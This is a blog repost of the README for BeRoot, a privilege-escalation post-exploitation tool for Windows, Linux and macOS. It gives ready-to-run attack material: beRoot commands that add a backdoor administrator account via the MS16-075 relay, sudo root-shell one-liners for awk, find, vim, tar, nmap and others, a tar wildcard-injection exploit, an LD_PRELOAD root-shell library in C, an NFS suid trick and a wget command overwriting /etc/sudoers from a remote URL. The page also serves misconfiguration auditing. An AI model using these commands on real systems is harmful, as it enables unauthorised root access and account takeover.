Home Unlabelled BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS

BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS

By
Monday, July 23, 2018
Read
Add Comment


BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS 

A compiled version is available here.

It will be added to the pupy project as a post exploitation module (so it will be executed in memory without touching the disk).

Except one method, this tool is only used to detect and not to exploit. If something is found, templates could be used to exploit it. To use it, just create a test.bat file located next to the service / DLL used. It should execute it once called. Depending on the Redistributable Packages installed on the target host, these binaries may not work.


Check the Following:

  • BeRoot For Windows 
  • BeRoot For Linux

BeRoot For Windows To Check Common Windows Misconfigurations

Run it

|===================================================
|                                                                    |
|                    Windows Privilege Escalation                    |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|===================================================

usage: beRoot.exe [-h] [-l] [-w] [-c CMD]

Windows Privilege Escalation

optional arguments:
  -h, --help         show this help message and exit
  -l, --list         list all softwares installed (not run by default)
  -w, --write        write output
  -c CMD, --cmd CMD  cmd to execute for the webclient check (default: whoami)

All detection methods are described on the following document.

Path containing space without quotes

Consider the following file path:

C:\Program Files\Some Test\binary.exe

If the path contains spaces and no quotes, Windows would try to locate and execute programs in the following order:
  • C:\Program.exe
  • C:\Program Files\Some.exe
  • C:\Program Files\Some Folder\binary.exe

Following this example, if "C:\" folder is writable, it would be possible to create a malicious executable binary called "Program.exe". If "binary.exe" run with high privilege, it could be a good way to escalate our privilege.

Note: BeRoot realized these checks on every service path, scheduled tasks and startup keys located in HKLM.

How to exploit: 

The vulnerable path runs as:

  • a service: create a malicious service (or compile the service template)
  • a classic executable: Create your own executable.

Writable directory

Consider the following file path:

C:\Program Files\Some Test\binary.exe

If the root directory of "binary.exe" is writable ("C:\Program Files\Some Test") and run with high privilege, it could be used to elevate our privileges.

Note: BeRoot realized these checks on every service path, scheduled tasks and startup keys located in HKLM.

How to exploit:

  • The service is not running:
Replace the legitimate service by our own, restart it or check how it's triggered (at reboot, when another process is started, etc.).

  • The service is running and could not be stopped:
Most exploitation will be like that, checks for dll hijacking and try to restart the service using previous technics.

Writable directory on %PATH%

This technic affects the following Windows version:

  • 6.0  => Windows Vista / Windows Server 2008
  • 6.1  => Windows 7 / Windows Server 2008 R2
  • 6.2  => Windows 8 / Windows Server 2012

On a classic Windows installation, when DLLs are loaded by a binary, Windows would try to locate it using these following steps:

- Directory where the binary is located
- C:\Windows\System32
- C:\Windows\System
- C:\Windows\
- Current directory where the binary has been launched
- Directory present in %PATH% environment variable

If a directory on the %PATH% variable is writable, it would be possible to realize DLL hijacking attacks. Then, the goal would be to find a service which loads a DLL not present on each of these path. This is the case of the default "IKEEXT" service which loads the inexistant "wlbsctrl.dll".

How to exploit: 

Create a malicious DLL called "wlbsctrl.dll" (use the DLL template) and add it to the writable path listed on the %PATH% variable. Start the service "IKEEXT". To start the IKEEXT service without high privilege, a technic describe on the french magazine MISC 90 explains the following method:

Create a file as following:

C:\Users\bob\Desktop>type test.txt
[IKEEXTPOC]
MEDIA=rastapi
Port=VPN2-0
Device=Wan Miniport (IKEv2)
DEVICE=vpn
PhoneNumber=127.0.0.1

Use the "rasdial" binary to start the "IKEEXT" service. Even if the connection failed, the service should have been started.

C:\Users\bob\Desktop>rasdial IKEEXTPOC test test /PHONEBOOK:test.txt

Or you can try using the Ikeext-Privesc powershell script.

MS16-075

For French user, I recommend the article written on the MISC 90 which explain in details how it works.

This vulnerability has been corrected by Microsoft with MS16-075, however many servers are still vulnerable to this kind of attack. I have been inspired from the C++ POC available here

Here are some explaination (not in details):

  1. Start Webclient service (used to connect to some shares) using some magic tricks (using its UUID)
  2. Start an HTTP server locally
  3. Find a service which will be used to trigger a SYSTEM NTLM hash.
  4. Enable file tracing on this service modifying its registry key to point to our webserver (\\127.0.0.1@port\tracing)
  5. Start this service
  6. Our HTTP Server start a negotiation to get the SYSTEM NTLM hash
  7. Use of this hash with SMB to execute our custom payload (SMBrelayx has been modify to realize this action)
  8. Clean everything (stop the service, clean the regritry, etc.).

How to exploit: 

BeRoot realize this exploitation, change the "-c" option to execute custom command on the vulnerable host.

beRoot.exe -c "net user Zapata LaLuchaSigue /add"
beRoot.exe -c "net localgroup Administrators Zapata /add"

AlwaysInstallElevated registry key

AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. To allow it, two registry entries have to be set to 1:

  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

How to exploit: 

create a malicious msi binary and execute it.

Unattended Install files

This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts including Administrator accounts. These files are available on these following path:

C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\unattend.xml 
C:\Windows\System32\Sysprep\Panther\unattend.xml


How to exploit: 

Open the unattend.xml file to check if passwords are present on it. Should looks like:


   
       
           
                RmFrZVBhc3N3MHJk
                false</PlainText></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; </Password></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; <Description>Local Administrator</Description></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; <DisplayName>Administrator</DisplayName></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; <Group>Administrators</Group></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; <Name>Administrator</Name></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; </LocalAccount></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; </LocalAccounts></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"></UserAccounts></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span><br /><h3 style="text-align: left;"><span style="color: #073763;">Other possible misconfigurations</span></h3><h4 style="text-align: left;">Other tests are realized to check if it's possible to:</h4><ul style="text-align: left;"><li>Modify an existing service</li><li>Create a new service</li><li>Modify a startup key (on HKLM)</li><li>Modify directory where all scheduled tasks are stored: "C:\Windows\system32\Tasks"</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS36H1QKW3XMTF4m9yk0qpt1eD3Xvg3dbD_7m3InxCk-Dw5zoU8vz_DBThLm1YMgrr6e8EAWn4uzILgA1dE2ct2vNrX27vNTUZjAiyTSn7u2jz5UkHLqn6YARj0VEWNGPrDoFyqVIi36L3/s1600/BeRoot+Privilage+Escalation.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1200" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS36H1QKW3XMTF4m9yk0qpt1eD3Xvg3dbD_7m3InxCk-Dw5zoU8vz_DBThLm1YMgrr6e8EAWn4uzILgA1dE2ct2vNrX27vNTUZjAiyTSn7u2jz5UkHLqn6YARj0VEWNGPrDoFyqVIi36L3/s640/BeRoot+Privilage+Escalation.jpg" width="640" /></a></div><div><br /></div><br /><h2 style="text-align: left;"><span style="color: #073763;">BeRoot For Linux</span></h2><div><div>BeRoot is a post exploitation tool to check common misconfigurations on Linux and Mac OS to find a way to escalate our privilege.</div><div><br /></div><div>To understand privilege escalation on these systems, you should understand at least two main notions: LOLBins (this name has been given for Windows binaries but it should be correct to use it for Linux as well) and Wildcards.&#160;</div><div>This Readme explains all technics implemented by BeRoot to better understand how to exploit it.</div><div><br /></div><h3 style="text-align: left;"><span style="color: #073763;">LOLBins</span></h3><div>LOLBins could be used to gain root privilege on a system. These binaries allow a user to execute arbitrary code on the host, so imagine you could have access to one of them with sudo privilege (suid binary or if it's allowed on the sudoers file), you should be able to execute system command as root.</div><div><br /></div><div><b>Here is a list of well-known binaries:</b></div><div><ul style="text-align: left;"><li><b>awk</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo awk 'BEGIN {system("/bin/sh")}'</span></div><div><ul style="text-align: left;"><li><b>docker (if you can call docker, no need to run it with sudo)</b></li></ul><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p</span></div><div><ul style="text-align: left;"><li><b>find</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo find . -type d -exec sh -c id {} \;</span></div><div><ul style="text-align: left;"><li><b>file viewer</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">less: !bash</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">man: !bash or $ sudo man -P whoami man</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">more: !bash</span></div><div><ul style="text-align: left;"><li><b>file modifications (cannot be consider as LOLbins but useful for privilege escalation)</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cp: sudo cp -f your_file /etc/sudoers</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">mv: sudo mv -f your_file /etc/sudoers</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div><ul style="text-align: left;"><li><b>ftp / sftp</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">ftp> ! ls</span></div><div><ul style="text-align: left;"><li><b>git</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #7f6000; font-family: "courier new" , "courier" , monospace;">export PAGER=./runme.sh</span></div><div><span style="background-color: #f3f3f3; color: #7f6000; font-family: "courier new" , "courier" , monospace;">sudo git -p help</span></div><div><ul style="text-align: left;"><li><b>mount</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo mount -o bind /bin/bash /bin/mount</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo mount</span></div><div><ul style="text-align: left;"><li><b>nmap</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">echo "os.execute('/bin/sh')" > /tmp/script.nse</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo nmap --script=/tmp/script.nse</span></div><div><ul style="text-align: left;"><li><b>rsync</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">echo "whoami > /tmp/whoami" > /tmp/tmpfile</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo rsync&#160; -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null</span></div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cat whoami&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">root</span></div><div><ul style="text-align: left;"><li><b>scripting languages</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">lua: os.execute('/bin/sh')</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">perl: sudo&#160; perl -e 'exec "/bin/sh";'</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python: sudo&#160; python -c 'import os;os.system("/bin/sh")'</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">ruby: sudo ruby -e 'exec "/bin/sh"'</span></div><div><ul style="text-align: left;"><li><b>tar</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">text editor</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">vi: sudo vi -c '!sh' or :!bash or :set shell=/bin/bash:shell or :shell</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">vim : sudo vim -c '!sh' or :!bash or :set shell=/bin/bash:shell or :shell</span></div><div><ul style="text-align: left;"><li><b>tcpdump</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">echo "whoami > /tmp/whoami" > /tmp/tmpfile</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cat whoami&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">root</span></div><div><ul style="text-align: left;"><li><b>wget (overwrite system file - need a web server)</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo wget https://ift.tt/2LFRNxz -O /etc/sudoers</span></div><div><ul style="text-align: left;"><li><b>zip</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">echo "/bin/sh" > /tmp/run.sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo zip z.zip * -T -TT /tmp/run.sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div><i>Note: If you have more binary example, do not hesitate to open an issue explaining the technic and I will add it on the list.</i></div><div><br /></div><div>Having sudo access on these binaries do not mean you could always manage to execute commands on the system. For example, using the mount binary with a limited user could give you the following well known error, if it's well configured:</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">mount: only root can use "--options" option</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><h3 style="text-align: left;"><span style="color: #073763;">Wildcards</span></h3><div>If you have never heard about Unix wildcards, I suggest you read this very well explained <a href="https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt" rel="nofollow" target="_blank">article</a>. Using wildcards could lead into code execution if this one is not well called.</div><div><br /></div><div>For our example, we want to get a shell ("sh") using the tar command to execute code on the server. As explained on the LOLBin section, we could get it doing:</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh</span></div><div><br /></div><div>We consider a test file which is used to realize an archive of all files present on the directory.</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">user@host:~$ cat test.sh&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">tar cf archive.tar *&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><b><br /></b></span></div><div><b>Here are the steps to exploit this bad configuration:</b></div><div><ul style="text-align: left;"><li>open nano (with no arguments)</li><li>write something in it</li></ul></div><div><b>save file using tar arguments as file names:</b></div><div><ul style="text-align: left;"><li>--checkpoint-action=exec=sh</li><li>--checkpoint=1</li></ul></div><div><b>Once created, this is what you will find:</b></div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">user@host:~$ ls -la&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">total 32</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-rw-r--r-- 1 user user&#160; &#160; &#160;5 Jan 12 10:34 --checkpoint-action=exec=sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-rw-r--r-- 1 user user&#160; &#160; &#160;3 Jan 12 10:33 --checkpoint=1</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 user user&#160; 4096 Jan 12 10:34 .</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 7 user user&#160; 4096 Jan 12 10:29 ..</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-rwxr-xr-x 1 user user&#160; &#160; 22 Jan 12 10:32 test.sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div>If this file is executed as root (from cron table, from sudoers, etc.), you should gain root access on the system.</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">user@host:~$ sudo ./test.sh&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sh-4.3# id</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uid=0(root) gid=0(root) groups=0(root)</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div>So depending on which binary and how the wildcard are used, the exploitation can be done or not. So on our example, the exploitation would not work anymore if the file would be like this:</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">user@host:~$ cat test.sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">tar cf archive.tar *.txt</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div>Thus, using a tool to detect these misconfigurations is very difficult. A manually analyse should be done to check if it's a false positive or not.</div><div><br /></div><h3 style="text-align: left;"><span style="color: #073763;">Sensitive files</span></h3><div>Lots of file are run with high permissions on the system (e.g cron files, services, etc.). Here is an example of intersting directories and files:</div><div><ul style="text-align: left;"><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/init.d</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.d&#160;</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.daily</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.hourly</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.monthly</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.weekly</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/sudoers</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/exports</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/at.allow</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/at.deny</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/crontab</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.allow</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.deny</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/anacrontab</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/spool/cron/crontabs/root</span></li></ul></div><h3 style="text-align: left;"><span style="color: #073763;">Here are the tests done by BeRoot:</span></h3><div><ul style="text-align: left;"><li>checks if you have access with write permission on these files.</li><li>checks inside the file, to find other paths with write permissions.</li><li>checks for wildcards (this check could raise false positives, but could also get you useful information). Sometimes, you may need write permissions on a specific folder to create your malicious file (as explained on the wildcard section), this check is not done because it could be done by two many ways on the script and it's difficult to automate.</li></ul></div><h3 style="text-align: left;"><span style="color: #073763;">Suid binaries</span></h3><div>SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it. So if suid file is owned by root, you should execute it using root privilege.</div><div><br /></div><div>BeRoot prints all suid files because a manually analyse should be done on each binary. However, it realizes some actions:</div><div><ul style="text-align: left;"><li>checks if we have write permissions on these binary (why not ? :))</li><li>checks if a LOLBin is used as suid to be able to execute system commands using it (remember you could have suid LOLBin without beeing able to exectute commands - checks LOLBin section with the false positive example using mount).</li></ul>To analyse manually, checking for .so files loaded from a writable path should be a great idea (this check has not been implemented on BeRoot):</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">strace [SUID_PATH] 2>&1 | grep -i -E "open|access|no such file"</span></div><h3 style="text-align: left;"><span style="color: #073763;">NFS Root Squashing</span></h3><div>If <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">no_root_squash</span> appears in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/exports</span>, privilege escalation may be done. More information can be found here.</div><h4 style="text-align: left;">Exploitation:</h4><div><ul style="text-align: left;"><li><span style="background-color: #f3f3f3; color: #274e13;">mkdir /tmp/nfsdir&#160; # create dir</span></li><li><span style="background-color: #f3f3f3; color: #274e13;">mount -t nfs 192.168.1.10:/shared /tmp/nfsdir # mount directory&#160;</span></li><li><span style="background-color: #f3f3f3; color: #274e13;">cd /tmp/nfsdir</span></li><li><span style="background-color: #f3f3f3; color: #274e13;">cp /bin/bash . # copy wanted shell&#160;</span></li><li><span style="background-color: #f3f3f3; color: #274e13;">chmod +s bash # set suid permission</span></li></ul></div><h3 style="text-align: left;"><span style="color: #073763;">LD_PRELOAD</span></h3><div>If LD_PRELOAD is explicitly defined on sudoers file, it could be used to elevate our privilege. \</div><h4 style="text-align: left;">For example:</h4><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Defaults&#160; &#160; &#160; &#160; env_keep += LD_PRELOAD</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div><b>Create a share object:</b></div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">#include <stdio.h></span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">#include <sys/types.h></span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">#include <stdlib.h></span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">void _init() {</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">unsetenv("LD_PRELOAD");</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">setgid(0);</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">setuid(0);</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">system("/bin/sh");</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">}</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div><b>Compile it:</b></div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">gcc -fPIC -shared -o shell.so shell.c -nostartfiles</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div>If you have a binary that you could launch with sudo and NOPASSWD, launch it with LD_PRELOAD pointing to your shared object:</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo LD_PRELOAD=/tmp/shell.so find</span></div><div><br /></div><h3 style="text-align: left;"><span style="color: #073763;">Sudoers file</span></h3><div>Most of privilege escalations on Linux servers are done using bad sudo configurations. This configuration can be seen in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/sudoers</span> file.&#160;</div><div>To better understand the BeRoot workflow, you should have an idea on how a sudoers line is composed.</div><div><br /></div><div><b>Basic line pattern:</b></div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">users&#160; hosts = (run-as) tags: commands</span></div><h4 style="text-align: left;"><b><span style="color: #073763;">Here is an example using aliases.</span></b></h4><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">User_Alias ADMINS = admin, user, root</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Cmnd_Alias ADMIN_CMDS = /sbin/service, /usr/sbin/iptables, python /tmp/file.py</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">ADMINS ALL = (ALL) NOPASSWD: ADMIN_CMDS</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div><b>So users "admin", "user" and "root" could execute "service", "iptables" and "file.py" without password needed (thanks to NOPASSWD):</b></div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">admin,user,root ALL = (ALL) NOPASSWD: /sbin/service, /usr/sbin/iptables, python /tmp/file.py</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div><b><span style="color: #073763;">So BeRoot will analyse all rules:</span></b></div><div><br /></div><div><b>if it affects our user or our user's group:</b></div><div><ul style="text-align: left;"><li>check if we have write permissions on all possible commands (in our example, it will test "service", "iptables", "python" and "/tmp/files.py")</li><li>check for LOLBins</li><li>check for LOLBins + wildcards</li><li>check if we can impersonate another user ("su" command)</li><li>check write permissions on sensitive files and suid bin for this user</li><li>realize again all these checks on the sudoers file using this new user</li></ul></div></div><br /><span style="font-size: large;"><a href="https://github.com/AlessandroZ/BeRoot/archive/master.zip" rel="nofollow" target="_blank">Download BeRoot</a></span></div><br /><br />from Hackers Online Club (HOC) https://ift.tt/2Lhr924<br /> <div div='adsense-content' style='display:block;text-align: center'> </div></div> <script type='text/javascript'> function insertAfter(addition,target) { var parent = target.parentNode; if (parent.lastChild == target) { parent.appendChild(addition); } else { parent.insertBefore(addition,target.nextSibling); } } var adscont = document.getElementById("adsense-content"); var target = document.getElementById("adsense-target"); var linebreak = target.getElementsByTagName("br"); if (linebreak.length > 0){ insertAfter(adscont,linebreak[1]); } </script> <script type='text/javascript'> function insertAfter2(addition2,target2) { var parent = target.parentNode; if (parent.lastChild == target) { parent.appendChild(addition); } else { parent.insertBefore(additionn,targett.nextSibling); } } var adscont = document.getElementById("adsense-content2"); var target = document.getElementById("adsense-target"); var linebreak = target.getElementsByTagName("br"); if (linebreak.length > 0){ insertAfter(adscont,linebreak[3]); } </script> </div> </div> </article> <div class='hreview' style='display:none'> <span class='item'> <span class='fn'>BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS</span> <img alt='BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS' class='photo' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8eOoe44o7mVMROybePnxyxHofDk0TGShNGBIOIdu219RcOxPsXdIEXHvdiF5JhWVYHkg_KBQnt8Ub9BOX5ABy7lESalHn74pOjo83UFcXN2DdRXfo1QzrnhC5OLzFI4TyYEt0iHiODflN/s72-c/Windows+and+Linux+post+Exploitation.png'/> </span> Reviewed by <span class='reviewer'>0x000216</span> on <span class='dtreviewed'> Monday, July 23, 2018 <span class='value-title' title='Monday, July 23, 2018'></span> </span> Rating: <span class='rating'>5</span> </div> <div style='clear:both'></div> <div class='post-footer'> <div class='label-head'> <span>Tags :</span> </div> <div class='share-art'> <a class='facebook' href='https://www.facebook.com/sharer.php?u=https://nexus-decode.blogspot.com/2018/07/beroot-post-exploitation-tool-to-check.html&title=BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS' onclick='window.open(this.href, &#39;windowName&#39;, &#39;width=600, height=400, left=24, top=24, scrollbars, resizable&#39;); return false;' 